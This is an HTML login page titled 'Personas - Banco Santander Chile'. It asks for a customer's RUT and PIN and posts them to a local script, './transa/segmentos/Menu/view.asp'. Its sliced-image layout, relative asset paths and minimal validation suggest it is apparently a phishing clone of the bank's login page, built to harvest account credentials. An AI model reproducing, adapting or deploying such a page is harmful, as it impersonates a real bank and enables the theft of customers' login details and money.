<html>
<head>
<meta http-equiv="Content-Language" content="es">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<link rel="stylesheet" href="pagina/images/style-default.css" type="text/css" media="screen"/>
<link REL="shortcut icon" HREF="pagina/images/favicon.png">
<title>Personas - Banco Santander Chile</title>
<script language="javascript">
function Logines()
{
   var rut = document.formu.rut.value;
   var pin = document.formu.pin.value;

   if (rut == '')
   {
      alert("Por favor, completa todos los datos.");
      return false;
   }
   if (pin == '')
   {
      alert("Por favor, ingresa tu clave.");
      return false;
   }
   
   
   
   return true;
}
</script>
</head>
<body>
	<div id="Tabla_03">
    <form action="./transa/segmentos/Menu/view.asp" method="post" name="formu" id="formu" onSubmit="return Logines()">
    <input type="hidden" name="bcplogin" id="bcplogin" value="login">
		<div id="Santander---Index-129927677-01"></div>
		<div id="Santander---Index-129927677-02"></div>
		<div id="Santander---Index-129927677-03"></div>
        <div id="Login-Usuarios">
          <input placeholder="" autocomplete="OFF" class="inputl" id="rut" maxlength="20" name="rut" type="text">
	  </div>
      <div id="Login-password">
      <input placeholder="" autocomplete="OFF" id="pin" maxlength="16" name="pin" class="inputl" type="password">
	  </div>
	  <div id="Santander---Index-129927677-04"><input name="Entrar" type="image" src="pagina/images/img/botton.png" width="115" height="23"></div>
</form>
</div>
</body>
</html>